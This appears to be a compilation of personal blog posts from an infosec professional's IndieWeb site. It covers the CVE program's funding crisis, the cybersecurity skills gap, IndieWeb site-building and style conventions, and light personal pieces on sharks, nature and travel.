Sharks are Dangerous

I maintain a healthy respect for all wild animals. They deserve as much if you ask me. They are also all equipped with a dizzying assortment of defensive capabilities. So for your own protection, I suggest everyone maintain safe distances and treat all life with respect. This is doubly-true concerning creatures that are of-the-sea.

I’m a land-walker. On-land, I feel like I can hold my own well-enough. I can see things that approach me, I can hear them, I can run pretty fast for a human, I can even pick up something to defend myself if I needed to. Not saying I could tussle with, and win, against any manner of land-faring beast, but I can do something. When it comes to the water though? I’m completely defenseless. I can swim, yeah—but that’s about it. I can’t really see underwater, I have no means to really detect if something is about to “get me”. I don’t think my futile punches or kicks would amount to much, especially against something like a shark.

All this to say, I do think Sharks are dangerous—or rather they can be. If you don’t have that healthy respect for them. They are apex predators afterall, and they dominate in a world that humans, just naturally don’t. You’ve probably seen that statistically, sharks aren’t particularly harmful to humans. This is probably true. As such, I think the danger of sharks is probably properly rated. Humans aren’t natural prey for sharks (thankfully), and we as humans do some things to avoid sharks where we can. Sharks are innately curious, and infinitely cool. I mean, I have a lot of shark-themed stuff on my site, so you know I have somewhat of an affinity.

Ransomware

I’m (professionally) in infosec, so I have an appreciation and technical understanding of Ransomware—how it can happen, how to defend against it, and the impacts of an incident. Ransomware is consistently placed at the top of “things to worry about” lists (e.g. Verizon’s DBIR) and yet, remains inadequately defended against time after time, across all observable sectors. I think it’s impossible to overrate the financial impact of a serious ransomware-related breach. Entire companies have been snuffed out of existence thanks to them—and ransomware-as-a-business in and of itself is measured in the billions, if not trillions, yearly.

Octopus Dishes

Fried, and then dipped in some sort of sauce? Sure. Otherwise? Ehhhh, not really my thing. Not a big tentacle guy I suppose. I gotta say overrated.

Yeah, I Made It Lilac

Fri, 18 Apr 2025 12:08:00 -0400

Did you know if you have your own website, you can do whatever you want with it? Like… it doesn’t have to be all snobby or professional. Or like… some of it can, but some of it could just not be, y’know?

Check this s*** out for example. I went positively rogue on this page.

Then, I slapped my derpy turtle shark thing there ⤴. For NO reason. Isn’t he breathtaking?

Does this post look good? Stop. Don’t care. Doesn’t need to. It is what it is—and what it is, is just something I felt like doing in the moment. I’m going to publish this. Then… I might tweak it. Maybe I’ll add more ridiculous stuff to it. Y’know, when I feel like it. Or, maybe I’ll take it down sometime. Maybe I’ll change the background title and color. I’ma just vibe, cool?

🚨 New font alert!! 🚨

Yeah that's right. Out of nowhere we got this fancy-lookin' font goin' on. Dope.

OK, we’re back.

🎵 Doopa-choppa-doooo 🎶—what should I do now?

I’m trying to send some sort of message here.

The message is simple, yet ✨eloquence✨ may not be my forté. Your site is for you—to be you–and you’re almost certainly kinda weird, right? So own it! Stop worrying about making it “perfect” (whatever that means). Or making it professional (🤢). Or making it need to have this or that. It ain’t that serious. Be more like this page. Be Weird.

Update!

I told you I’d do this. I was munching on a block of extra sharp cheddar cheese thinking about this post and decided I had some more I wanted to say.

You look at this page and you might think it’s “weird”. I mean I do. I’ve said as much throughout. But why? Was it really so long ago that almost all sites looked like this? Personalized. Amateur. Unique. Human—in a time of the “old web”. It does seem like it was a lifetime ago doesn’t it? It’s too bad that people’s blogs have become not like this. The substack-ification of people’s web presence is what’s grotesque if you ask me. I dunno… can you make just one of your pages on Substack lilac? 🌸

…probably not 😔

Come here (the IndieWeb) and be weird with me. With us.

The Death of CVE

Wed, 16 Apr 2025 10:52:00 -0400

The CVE program is dying. Damn. ¹

What does this mean? What were CVEs (Common Vulnerabilities and Exposures) doin’ for us anyway? Are CVEs considered critical cybersecurity infrastructure? What are we gunna’ do now?! Panic!! Read on for more hyper-composed and ever-well-researched analysis! (Plus, plenty of related resources, per usual.)

Disclaimer: It's more than likely I get something wrong in the analysis below. The situation is also very rapidly evolving. This is just my hot take on everything, and my perspective as someone who worked in the VM field for quite some time. Feel free to message me with any corrections! I reserve the right, and almost certainly will, return to this post and update it as I learn more. This is but a jumping off point!

What is CVE All About?

OK, a quick primer on the CVE program—from CVE.org…

The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities.

Here’s an example of a single CVE record (for CVE-2014-6271, a.k.a. “ShellShock”)…

As you can see, CVE records contain a wealth of data for known vulnerabilities: publish dates, descriptions, product status(es), references to supporting materials, exploit PoC’s, and more. The idea is to have a CVE record for any and all CVEs under the sun. Useful yeah? That’s about all I’ll cover about what the CVE program is here. For more info, just go check out cve.org (or some of the other resources if / when cve.org dies 💀).

CVE in Practice

So, how are CVEs used by the larger infosec industry? In many more ways than I’ll likely be able to cover here, but I want to touch on a few ways this information is embedded. Namely, in terms of vulnerability management and vulnerability scan-related operations.

Here’s some basics on how CVE data makes it’s way to you, the infosec populace.

Vendor releases ~~crappy~~ insecure software.
Vulnerabilty Researcher identifies vulnerabilities in said software and discloses it to vendor.
Vendors (often acting as official CNAs) assign CVE IDs to vulnerabilities and publish CVE records.
CVE.org aggregates and publishes vulnerability records via a centralized database.
Consumers of this data ingest newly published vulnerability records. (e.g. network/endpoint scanning vendors)
Corporate IT Security teams run said scanning tools.
Along the way, CVE Working Groups help improve CVE-related processes.

To put simply, scanning tools are able to identify vulnerabilities because CVE records contain valuable software and version information. These tools can compare known versions of installed software with the database of vulnerabilities that tell us what sofware+versions are affected / vulnerable. So, without CVE data, vulnerability scanning fidelity craters.

There is a lot of other infosec / vulnerability-related infrastructure that relies on the CVE program as a dependency. CISA’s KEV is one example. I’ve got to think that many threat intelligence sources also leverage a lot of CVE data too.

None of this sounds great so far. So what’s next?

Now What?

Well, first of all, CVE is pretty important for a lot of things, so it looks like CISA has found a way to keep it afloat for now. ¹

There’s a lot of potential scenarios whereby CVE as we know it today just sticks around and keeps hummin’ along as it has. The government could come to its senses (lol), or it could find funding elsewhere. I don’t know how much it costs to run that whole operation, but it can’t be much compared to the revenue some of these companies that rely on it bring in.

Some have started to argue that the loss of CVE could actually help the industry, and that the CVE model had run its natural course. Maybe they’re right?

Even if CVE as we know it today keeps on keepin’ on, this should be a wakeup call for the world, and for IT and IT-security programs. What would it mean to have CVE vanish overnight? As it seemingly almost did. Would this mean the death of Vulnerability Management entirely? I don’t think so. Would it mean that vulnerability scanners would be completely dead in the water? Not exactly. Would we have any actionable vulnerability intelligence data without CVE? I believe so. Would this cripple the infosec industry? Nah. It’d be a gut punch for sure, but there’s some resiliency in play. Let me talk a bit about how VM programs and the larger scanning industry would need to adapt…

The CVE program has done a lot to get us where we are, but I believe a lot of this infrastructure stays in-place regardless of what happens to cve.org itself. Vulnerability researchers are not staffed out of cve.org. So research can continue on as it always has. The vendors to which these researchers disclose vulnerabilities to also are unaffected. So vendors can continue to receive vuln disclosures and publish vulnerability data via their disclosure portals as they have been doing. The difference now is that there is no centralized repo by which all of these disparate vulnerability repos will be ingested. We can adapt to that it seems right? Scan vendors can go directly to these companies sites and pull vuln data in, and VM teams across the world can do the same. Not to trivialize the work it would take to fetch data in a decentralized manner, and then normalize all that data—but it’s all there!

We as an industry may want to evaluate how hard-coded CVE data is into our regular operations, but I think we’d be fine without it in the worst case scenario. Hell, lessening our reliance on CVE could actually help improve security in some ways if it meant doing less “baseline” security and more critical thinking 🤔.

Alternative Funding

In light of the precacious funding situation of the CVE program, here’s some ideas on how else it could be funded…

The CVE Foundation was just launched to “Secure the Future of the CVE Program”. It was founded by a coalition of CVE Board members. More to come from them…
Given how many vulnerabilities are present in Adobe, Oracle and Microsoft products, maybe they should help support CVE! 😅
So much of the infosec vendor industry is reliant on CVE. It seems like they could put their heads (and wallets) together to help sustain CVE. Looking at you Tenable, Qualys, Rapid7, et al. 👀
Other governments have already started to step up to fill the gap. Check out ENISA.

Vulnerabilty Catalogs

I’ve long maintained a comprehensive list of Vulnerability Catalogs. Not all of these are one-for-one replacements for CVE.org, but it goes to show that vulnerability intelligence would still exist and other vulnerability databases are there to pick up the slack.

Memes

The hottest CVE meltdown memes, collected and made available here for you.

News

Journalist and news organization publications:

Resources

Other resources, posts, discussion and info related to this whole mess.

No lapse in critical CVE services ↩ ↩²

The Cybersecurity Workforce Crisis

Tue, 15 Apr 2025 21:42:00 -0400

Much digital ink has been spilt on the plight of the cybersecurity workforce. Is there a talent shortage? A skills gap? Other, darker issues? Here’s what I think…

The “Talent Shortage”

First, some back story… When I was getting started in infosec, back in 2010-ish, I remember the on-radio campaigns which spoke of endless opportunity in the up-and-coming “cybersecurity” field. Over time, the messaging became that of a severe shortage of people to staff in these roles. Even back then though, despite all the claims of a “shortage”, getting an actual infosec job wasn’t easy—even for someone with a relevant degree and a few certifications. In the years since, interest in cybersecurity as a profession has surged. You can thank the above-average pay, remote work, and other intrinsic benefits I suppose. These days, you could argue that we’ve hit some level of saturation, especially in the entry- and junior-level ranks. This is evidenced by the countless stories of aspiring infosec pros who go months on end, applying to 100’s of jobs and do countless interviews with nothing to show for it. Mind you, these are more often than not, individuals who have 4-year degrees, who have multiple certifications, and who have done many other things to prepare and boost their qualifications to best pitch themselves for mere entry-level roles. To me, I think this contradicts the theory that there is some sort of talent (pool) shortage. We’ve got plenty of people interested—raw and unrefined—but there, ready to get to work. So the question is then, if the cybersecurity workforce crisis isn’t one of a talent shortage, what is the issue? Does the existing and aspiring workforce suffer from a “skills gap”? To this, I think the answer is a resounding “yes”, but maybe not for all the reasons you might believe…

The “Skills Gap”

As I’ve already stated, even the entry-level aspirants and lucky receivers-of-jobs these days almost uniformly have 4-year degrees, one or more certifications, and plenty of other worthy accomplishments. Yet, this has not seemed to make a meaningful dent in the aforementioned “skills gap”. Consider now the slightly more tenured infosec pro. One who (if fortunate enough) not only has a few years of “experience” but also may have attended several trainings at this point and could then hold multiple certifications. Likely, many of those certs are from vendors like SANS, ISC² and EC-Council. Yet again, the skill deficiencies persist. How is it that we have so many college-educated, multi-cert wielding, many-a-year-on-the-job-having infosec pros still having so little to show when it comes to real-world, applicable infosec skills and know-how? Let’s play the blame game…¹

Weak Blames

One of my weaker blames is that of training budgets. I think a lot of companies, and thus the industry as a whole, do an abysmal job providing adequate time and budget to train their infosec workforce. But, as you’ll see in a minute, access to what passes as “training” is hardly the problem, as the training, even if made SUPER-available, is just not closing the skills gap anyway.

Strong Blames

My stronger blames lie with the tenured infosec community, the cybersecurity vendors, and corporate infosec programs themselves. Let’s start with the grizzled veterans of infosec—the folks with the skills. First, I want to point my finger there. There is real opportunity for mentorship, but I think as a whole, we have failed to build these bridges. We grumble and complain about “script-kiddies”, and “paper tigers” and whatever, but do we take the time to mentor and train? Nah.

Now let’s talk about what it means to get “experience” in infosec. I think overwhelmingly, infosec professionals are put on rails with respect to their job responsibilities. Here’s some tools you are expected to know how to operate, but not expected to know how they work under the hood. Here’s a framework you are expected to audit your IT program or business against. Here’s your corporate, technical “swim lane”, that you must operate within, and never stray outside of. That sorta thing. I don’t think infosec tools are inherently “bad”, or useless in terms of providing value or reducing risk, but as you can tell from the state of cybersecurity in the world, they are in no way the silver bullet. We continue to have breach after breach, security failure after security failure due to infosec 101 type-of-stuff—stuff the tools are not stopping. These companies have tools. We have personnel that operate them. That (buying and running tools), if anything, is what we’ve become good at. But it clearly isn’t enough! The infosec industry, we as engineers, were never meant to be exclusively put behind the limited capabilities of these tools. What if we could do something different? Like, look at these problems and come up with practical solutions based on a found understanding of infosec principles.

But herein lies the problem. The modern infosec “pro” is no longer conditioned to solve ad-hoc problems, or problems of complexity. We’ve been on rails too long. If the tool can’t solve it, how could we? If it’s not one of the exact usecases covered in the Day 4 lab of our latest SANS course, what’re we supposed to do about it! If it doesn’t fit neatly into one of our precious CISSP knowledge domains then oh no! We’ve lost our way, and with it, we’ve abstracted too much of the basics, the real engineering away. It should be expected that all infosec pros are able to do some relatively basic stuff—across operating systems, with standard networking protocols, with industry-standard, open-source tooling. We should be able to hack together basic scripts to do simple things. We should understand the tech stack and supporting protocols of any run-of-the-mill web application. But can you really say that even 20% of infosec “professionals” know these things? I’d say not. But I sure as hell would bet that each of us know one or more enterprise tools super-duper good. How many infosec folks out there can operate Splunk with medium-to-advanced proficiency but can’t actually pull and decipher a packet capture? How many VM analysts can pull off all sorts of wizardry with Tenable, but couldn’t practically exploit a real vulnerability? We’ve become too reliant on tools, and we’ve creatively and technically boxed in our security workforce as a result.

Training vendors aren’t closing the skills gap. “Work experience” is not closing the skills gap. Those of us with useful knowlege, and wisdom to share, are not helping to close the skills gap. The skills gap is real my friends, and there is blame to go ‘round.

Just Look At Me

I feel I can speak on this topic because I’m a product of it. Get this cert. Get that cert. Use this tool. Use that tool. Getting certs and knowing how to use tools has been pretty great for my career, but what have I learned? Have I really advanced my knowledge? The issue with so many “trainings” these days too is that they don’t teach core concepts. They don’t cover fundamentals. They like to focus on the shiny things. The abstractions. The tools. The practical, yet hyper-specific usecases. They hold your hand through exercises and labs, giving you a false sense of know-how, but when you are turned loose in a real-world, corporate setting, you are left wondering “what do I do?”. That’s if you even get a chance to use what limited skills you may have picked up in training on the job. For most, I feel like they’ll go get training for something, and then return back to their routine daily job responsibilities, which require no practical usage of what they had learned in training. So that knowledge, when not practiced, will fade away. Plus, we’ve all just been conditioned to pick up certs, and put fancy letters in our email signatures and LinkedIn bios, entirely discounting the journey that got us there. Get a cert, get a better job. Rinse and repeat.

Let’s Adapt

We need to adapt. Let’s open up the cyber-swim-lanes. Let’s establish lines of mentorship from professional generation to professional generation. Let’s build training into our corporate culture and then give professionals the space to practice it, to operate with creative license, to solve problems—not with tools, but through the application of actual security fundamentals. I mean we all learn it. It’s really not arcane magic. We all have the “CIA Triad” etched into our cyber-brainz. We can all do a risk assessment—we just have become so vendor-tool-addled and compliance-pilled that we’ve forgotten how to look at things holistically, do actual root-cause analysis, troubleshoot at a low level—really solve issues, in the bespoke and tailored manner in which we otherwise could. The answer to your next cybersecurity issue shouldn’t immediately be a phone call to <INSERT VENDOR NAME> to add-on another paid module in some tool. What if instead, you engaged your cybersecurity workforce, and I mean the actual engineers, not the “cyber leadership”, and asked, “how do we solve this problem”? Then, give them the space to actually do it. I’ve seen it work—honestly, I have. The knock-on effects can be wondrous too. Save money on tooling subscriptions, have a more engaged infosec team, actually reduce risk, build a real culture of engineering, that sorta thing.

I don’t want to trivialize the difficult nature of the infosec industry at large. If things were so easy, I imagine it would have been solved—right? But I think it’s safe to say that a crisis does exist. It’s also fair to say that the way we’ve been doing things just isn’t working. More SANS training isn’t bridging the gap (no offense SANS!). More team charters and vendor tools hasn’t bridged the gap. It’s time to do things differently.

Look, maybe it’s just me. Maybe I’m just projecting my own shortcomings. Not everyone suffers the same, and not every company has the same all-around deficiencies. This is just the way I see things. Looking “across the industry” though, I’m seeing some of the same patterns, and I don’t think I’m terribly far off.

New SANS Report Finds Cyber Talent Crisis Isn’t About Headcount. It’s About Skills. ↩

Renewal

Tue, 15 Apr 2025 12:25:00 -0400

This month I’ve decided to participate in my first IndieWeb Carnival—a once-a-month writing prompt organized by the IndieWeb.org community. This month’s prompt is “Renewal”, hosted by Jamie Thingelstad.

There’s a lot on my mind lately in regards to this term—“Renewal”. I recently moved into a new house and with it I have a yard. The yard has a lot of plants and trees that are now flowering—cherry blossom, red bud, skip laurel, rhododendron and more! This is my first spring here so it has been fun to see what bloomed, and given me an opportunity to learn more about these plants.

This site, shellsharks.com, has also seen quite the renewal—or better put, a revival. 2025 has been a very busy year for me in terms of sprucing up the site, writing regularly and exploring an even greater breadth of topics and content types. This momentum always energizes me creatively and gives me productive momentum in other areas of my life—professionally, around the house, and with other assorted projects.

I’m not sure what else to really go on about. My life seems to always be a constant stream of new things. This is by design, and unavoidable. To continue to stay on top of it all, it’s always helped me to reframe these challenges, these endless lists of to-do’s as something “new”. Whether it be a new way of approaching an old problem, or in fact a new issue altogether.

So, here’s to all things new, and “re”-new for me this year! 🌻

Just Put It On Your Blog

Mon, 14 Apr 2025 15:33:00 -0400

If you’ve got something to say, something to share, something that others might be interested in—why not just put it on your blog?

Someone ask a question on social media that you want to answer? Write about it on your blog and link to it in your reply thread.

Post anything to social media? Archive it to your blog.

Have an interesting, random thought? Write about it on your blog.

Remember a weird dream? Document it in a dream journal on your blog.

Find some other cool articles or web sites? Link to them from your blog.

Have a great soup recipe? Share it on your blog.

Have a bunch of resources related to one technical thing you know how to do well? Document those resources on your blog.

Find yourself repeating the same thing a lot? Write a blog post about it and share that instead.

What’re you up to right now? What’d you do yesterday? Get into anything cool last week? What about last month? Write about it on your blog.

Like something a lot? Or maybe you really don’t like something? Go off about it—on your blog.

Like to doodle? You know where to share ‘em.

Saw a good movie or listened to a really great song? Talk about it on your blog.

It’s great to have a place to share your thoughts. A place you can go back to when you want to remember something you had written or thought about before. A place you can refer people to when they have questions you’ve answered in the past. A place to be you. So, get a blog, and put all the things there.

Nature Appreciation

Mon, 14 Apr 2025 08:51:00 -0400

This week’s Blog Questions Challenge is called “Nature Appreciation”.

Here are the questions…

What’s the silliest animal you’ve ever seen in nature?
If you could have any plant’s superpower, what would it be and why?
What’s your favorite sound of nature and where did you last hear it?
If you could design your own perfect little nature spot, what would it include?

Silliest Animal I’ve Seen

The Bactrian Camel was the first come to mind. Camels have pretty silly (and grumpy) personalities as it is, but the Bactrian variety have wildly ridiculous camel humps. I got up close and personal with some at a wild live reserve kinda’ thing once.

Plant Superpower

Honestly I did some web searching to find cool “abilities” I would want to steal from a plant and came up kinda empty. Fire resistance, regeneration, growing super tall—these are all things that are kinda cool, but nothing specific stood out to me. So, as my pick, I’ve decided to go with the wise old Oak Tree. For any particular ability? Not really. I just like the idea of being a chill old Oak Tree that animals love to hang out with.

Favorite Nature Sound

I’d say it’s a close tie between the sound of a mountain stream and that of a rain storm with low, rolling thunder.

The Perfect Nature Spot

Easy. Western-facing, mountain-side cabin. Conifers as far as the eye can see. A mountain creek babbles nearby. The glow of a camp fire flickers across my face as I watch the sun melt behind the distant peaks.

Thanks for reading!

Welcome Home

Wed, 09 Apr 2025 15:32:00 -0400

Home is a place of comfort. Home has that particular smell. Home is where our stuff is. Its halls you know so well. It’s where we gather with friends, and the decor is uniquely you. It may have cracks in the foundations, and another issue or two. It won’t ever be perfect, always a work-in-progress. But home is home, and you love it nonetheless.

A website, your own personal website, is just like this—a digital home, on the web. With all the same comforts, familiarities and problems that need-a-fixin’. You can design it how you want, add rooms (pages), invite friends over, paint the walls, hang some art, share your recipes, get some much-needed peace and quiet, anything! But unlike actual home ownership, it’s a lot more attainable (financially-speaking).

This is how I think about my site. It’s truly become that way for me. It’s just a place I like to go to—to hang out, read stuff I’ve written about before, explore, experience, and just chill. I see little things that need to be fixed and I go tinker. I get inspired by something I’ve written about in the past or from something I’ve seen elsewhere and I go make an addition on my site, or I write some new post. Because it’s my site, it always feels like I’m building something. There’s a real investment to it. With it comes pride, and a feeling of accomplishment. Also as a bonus, it’s something I know the rest of the world can enjoy, take inspiration from or just send me nice feedback about. But there are no “likes” here. You don’t have to bake in social features—comment systems, webmentions, anything. I can just hang out here, by myself. Do whatever I want—just vibe.

Others have pointed out, more eloquently than I will, that other places on the net will never give you this feeling. Sure, they may be great forums for socializing, or for getting your message out, but they will never feel like home in the same way a personal website can. Importantly, the things you build and share on those platforms are not yours. Your content, your network, your identity—all borrowed, all rented. When those platforms disappear, all of that goes with it. When those platforms enshittify, or jack up prices, or otherwise become places that are less hospitable, you realize they were never homes. They’re spaces owned by corporations, and subject to all that comes with that. They can add what they want. Take what they want. Remove your content. Delete your connections. They can force you to interact with those you don’t want to. You may never get a break from the noise.

We’re humans. We are social. So those spaces can be great for socializing. But most of us don’t want to live at the bar, or at the coffee shop, or in one of these social spaces. We all want some kinda place to retreat back to. A place of safety. Where all of our stuff is. A place to kick off the shoes. Be messy. Do whatever we want. So build yourself a website—welcome home.

Extending indieweb.txt With Reference Information

Tue, 08 Apr 2025 14:26:00 -0400

Indieweb.txt is an idea for sharing information about one’s indie site with the world. It is a proposal which resembles other plain-text, web-bourne, information-sharing documents such as humans.txt and security.txt. As initially proposed, it would contain information such as the tools one uses to implement IndieWeb capabilities, information on Indie-Web-related strategies employed by the webmaster and writings on why the site owner has embraced the IndieWeb.¹

This is an idea / proposal to extend indieweb.txt with a new section I’ve dubbed “Reference Information” (I’m open to better ideas for the name). Its usecase(s) are somewhat simple. It is a place for you, an owner of an IndieWeb site, to share information about how you would like to be referenced on other sites.

An example of this section as it looks on my site is below…

/* Reference Information */
  - handle: shellsharks
  - name: Mike
  - font-color: #CA3342
  - background-color: #323232
  - citation-css: .shellsharks-com { color:#CA3342; }
  - contact:
    - email: mike@shellsharks.com
    - fediverse: @shellsharks@shellsharks.social
    - hello: https://shellsharks.com/hello

Use Cases

The inception of this idea came from my repeated referencing (e.g. What’s A Home Page & Thanks) of a few of my favorite indie-site personalities, whereby I link to their sites using styling that is native-to and evocative-of their respective sites. I pulled that styling information using developer/site-inspection tools in my browser and as such probably came pretty close to nailing the styling, but what if instead of me trying to reverse-engineer how they might want to be uniquely referenced on my site, there was a way they could expose that information to me so I can reference them exactly as they would want? With this proposal, one could gather font aesthetics, name, background colors and really anything else one would need to best reference others on their own site. So, for example, you can refer to me as shellsharks.
To help with ease-of-use with the initial use-case, I’ve defined a parameter html-reference which would basically be some single-line HTML syntax someone could drop in to their site to easy-reference someone else.
Another use-case comes from the contact parameter. Here someone could share how they would like others to reference their contact medium. So if I were to say, you can contact “SO AND SO”, I would link to whatever their first contact field is (ordering is important here). So as an example, by default you would suggest contacting me via mike@shellsharks.com as that is my top-line contact value. However, for contacting me via the Fediverse, you could reach out to me @shellsharks@shellsharks.social, as indicated!
I’ve long-had an idea for an RSS-ish app that would/could grab certain style-related information from a site to populate the look of post records in the client. This would be one useful building block of an app such as this.
Other information could be included here such as a link to a profile pic, Slash Pages that are available on your site, and more!

Let me know what you think of this proposal! If you implement an indieweb.txt file and add this information, let me know and I can try out referencing you somewhere on my site!

The initial indieweb.txt proposal leans a little too heavy into documenting things like IndieMark score and usage of niche “IndieWeb building blocks”. They are not my cup of tea, and are ultimately not important in gauging how “indie” your site is. ↩

Manual of Style

Tue, 08 Apr 2025 10:37:00 -0400

This is the Manual of Style for Shellsharks.com. It details the conventions and other practices used for writing, editing, styling and generally composing content across the site.

It is worth noting that adherence to stated stylistic rules and principles is not uniform, either because I’ve failed to follow them or have purposefully deviated from a normal writing practice. So pardon the anomalies!

Structural

All content has some summary of the post as the first paragraph. A lot of widgets on my home page, activity page and elsewhere rely on either the excerpt (first paragraph) or front matter description to populate the widget content. At times, I will use a pair of <br> tags to extend an excerpt beyond a single paragraph.
Paragraph breaks are used mostly for legibility, but I also try to employ them at logical, content-related breathing points/separators.
Section headers are used to separate different topics and subtopics as well as to provide means to deep-link to important points/content. Specialized, deep-linked content is often done with custom span + id blocks (e.g. <span id="IDHERE">CONTENT</span>).
Horizontal rules (<hr>) are used (at times) to separate intro sections from the main content, as well as to separate appendices from the main content. For larger posts, I may use rules to visibily separate sections. The Shark Fin <hr> is used when I want to add a bit of extra whimsy. I try to not have more than one of these visible on a page at the same time.

Punctuation

Single hyphens buffered by a space on each side ( - ), and Em Dashes (—) are used frequently to provide extra information, examples and other supplementary facts to sentences.
Italics are generally reserved for emphasizing words, as I would conversationally. I also use them for signifying terminology (e.g. this sentence is in the Punctuation section of this post).
Bolded terms are meant to highlight the main point of a sentence, paragraph or section. I also use bolding to emphasize words beyond what italics might provide.
Underlining is yet another way I tend to emphasize things.
Ellipsis (…) is used commonly to denote that the next section, paragraph, list or image is directly related to the previous content.
Proper nouns typically have the first letter Capitalized.
On somewhat rare, and inconsistent occasions, I will underline the titles of referenced blog posts and other publications.

Linguistic / Conversational

Conversational linquistic affects (e.g. “ok”, “alright”, “so”), commonly found at the beginning of sentences, are typically italicized.
Italics are used for words that are conversational in nature.
I use parenthetical asides (like this one) to provide inline commentary and bonus context. Often, these asides are italicized to signify my own speech.
My writing includes a lot of “G-dropping”, whereby I drop the trailing ‘g’ from ‘ing’ words, replacing that ‘g’ with an apostrophe. This is a conversational/colloquial habit.
Emojis are commonly used to express emotions. 👍

Aesthetics

In many cases, when mentioning “Shellsharks” (referring to the website itself), or when mentioning the Newsletter “Scrolls”, I will style them using the .shellsharks-com & .shellsharks class colors (respectively) (as defined in the Style guide). This is a newer convention, so will be something seen more commonly in newer content.
Aesthetic styling is defined in this site’s Style page.

Other

Where possible, I do inline linking to anything and everything I reference both here on this site, and externally. For longer posts, especially those that are particularly “reference-ey”, I make use of inline citations[^1], tables-of-contents and references appendices.
My usage of first and second-person is haphazard. Sorry about that.
I have many different “types” of posts. What they are, and how I use each one is described here
When referring to another individual on the web, I prefer inline-linking to their “About” page on their personal website (if they have one). If not, I will fallback to a Fediverse handle link or link to their site’s home page.

Blogging Methodology: My process/methodology for ideationg, writing and editing.
Good Sitekeeping: Things I like to see on people’s web pages.
Guiding Principles: The principles that guide me as I write and build this site.
Links: A love letter to links.
Multiplicity of Writing: Describing the different types of post content on this site.
Style page: How this site is styled aesthetically.
Syndication Strategy: How I syndicate and share content to and from this site.
Web Page Annoyances: Things I don’t do! (and some I do)
Writing Mannerisms: The precursor to this Style Manual, and a place where I’ve documented a number of writing peculiaries/oddities of mine.

This guide/manual was inpsired by the Fedran Style Guide.

Things I Wish I Knew Before I Made My Website

Mon, 07 Apr 2025 11:35:00 -0400

Here’s a list of things I wish I had known before I set out on my blogging / site-making / IndieWeb journey. (In no particular order)

Had I known these, and carefully considered each, I would have saved myself A LOT of time fixing stuff, and even now, would have a lot less things to fix and add. For example, my CSS files are a mess, I have a lot of poorly managed inline .JS everywhere, accessiblity nightmares abound and much more… Learn from my mistakes!

Understand and properly leverage Semantic HTML Elements. This approach will help your code be more readable, more modular and more descriptive.
Be purposeful and methodical with your CSS “code”. Try to define common sense CSS and make it reusable. To the best of your ability, try to avoid overusing inline CSS. It will make things harder to troubleshoot and more annoying to maintain over time. Take the time to understand dynamic HTMl stuff for different screen-sized devices, etc… You’re going to want your site to look good on desktops and phones, simple as that.
Use JavaScript sparingly, try to design your site to work well-enough for those who completely disable JavaScript. Look, my site has plenty of JS, and I know certain things would completely break if it were disabled (looking at you hamburger menu). That’s really too bad for folks who want to use my site. I’d like to fix this, but just haven’t had time to figure it out. Also consider The JavaScript Trap. JS not only has incompatibility issues, but can also just slow down your site and introduce potential security vulns. Important things to consider!
Don’t box yourself in creatively—REALLY! Allow yourself to write about whatever you want. Use things like collections, different post types or tags to logically differentiate things you think are meant for different audiences if you must.
Version one of your site should have a theme toggle (i.e. dark/light mode) and a search function. You’re going to want these eventually, and it’s worth getting them right in the initial design if you ask me.
Build accessibility in from the get-go. I’ve put very little effort into this, and that sucks. One of my Guiding Principles for this site is that it is available to be consumed by all. Yet, if I’ve not made it adequately accessible, it will never meet this mantra. It’s not necessarily hard to do, but if you don’t consider it from t=0, it becomes harder and more time-consuming to retroactively make it so.
Write for yourself, not for some perceived “audience”. Don’t try to be a persona (i.e. some “professional” fragment of your true self)—just be yourself.
Do some basic website wireframing as part of your initial size build. Carefully consider what you want your home page to look like, how you want people to navigate about, what you want your posts to look like, etc…
How “social” do you want your site to be? In the age of the social web, there is a lot you can add or implement to make your site interoperate with ActivityPub, IndieWeb protocols, comment systems, etc…
Check out my guide on Good Sitekeeping—Site Styling & Design Things I Enjoy and Recommend.

Oh, and here’s a bunch of things you shouldn’t worry about, and some things I suggest you avoid. Best of luck!

Travel Adventures

Mon, 17 Mar 2025 14:18:00 -0400

Here’s another Blog Questions Challenge. This week, it’s all about Travel Adventures!

Here are the questions…

What’s the silliest souvenir you’ve ever brought back from a trip?
If you could teleport anywhere right now, for a day trip, where would you go?
What’s the weirdest food you’ve ever tried while traveling?
What’s the most memorable “wrong turn” you’ve taken on an adventure?

Silliest Souvenir

In 2014 me and my wife went to Costa Rica. We did a lot of travel-by-bus to various excusions and destinations across the country. During those bus rides, I (for whatever reason) witnessed an unusual amount of machete-based chopping of vegetation and general plant-related growth on the sides of the rural roads we traveled down. Now this might not be unusual for Costa Rica, but it was for me as a tourist. So naturally, I wanted to get a machete as a souvenir. At the time of purchasing it, I never considered what it would look like, trying to get a huge machete back through customs at the airport…

State-side, we got to security and that’s when I remembered my cargo. Sure enough, going through security I was asked to come with them to a back room as they had some questions for me. I thought for sure it was because of the machete. But nope! They were interested in a different souvenir of mine. We had also purchased a “rain stick”, which is effectively just a hollow wooden tube filled with small beads. They were really curious (and slightly concerend) about what all those little beads were inside the stick. After a brief explanation though they were satisfied and I was on my way once more. Not even a single mention of the machete. Hah!

Teleport for a Day Trip

That’s me in Bora Bora circa 2016. There’s a very non-zero chance that I was thinking about climbing that mountain in this exact moment (in addition to just posing for a super-cool sunset pic). If I could teleport to one place for a day to do something, it wound be here, to hike Bora Bora’s Mount Otemanu. Afterwards, I’d just chill on the beach with a nice beverage and watch the sun set, much like I did in 2016. 🏝️ 🌅

Weirdest Food

In 2013, I went on my first international trip ever. So where does one go on their first trip out of the country? Africa of course! Me and my wife went to South Africa—first to Cape Town and then to Kruger National Park for some safari-ing. To this day (and I’ve done a fair bit of travel since), I would still say it’s my favorite trip I’ve ever done. One night, while dining out in the city-center of Cape Town, we ordered what I remember as some sort of “exotic meat sampler”. On the resulting plate, we tried a number of interesting South African-native game including Kudu, Crocodile, Springbok and if I’m remembering fully, Zebra. All I really remember about that experience beyond what I tried was that Kudu was delicious, and I was not into the croc.

Memorable Wrong Turn

Look, my wife is the (trip) planner of the two of us, and she is amazing at it. What this means is that our trips are always fantastic, we get into a TON of fun activities, and we rarely encounter anything you might consider a “wrong turn”. That said, this particlar question made me think of two distinct wrong-turn-esque events…

Once, while driving somewhere in Germany we witnessed this little car in front of us try to make too sharp of a turn on a highway on-ramp and completely spin out—like a 360° spin. It was wild, and quite scary to witness. A “wrong turn” for that individual to say the least.
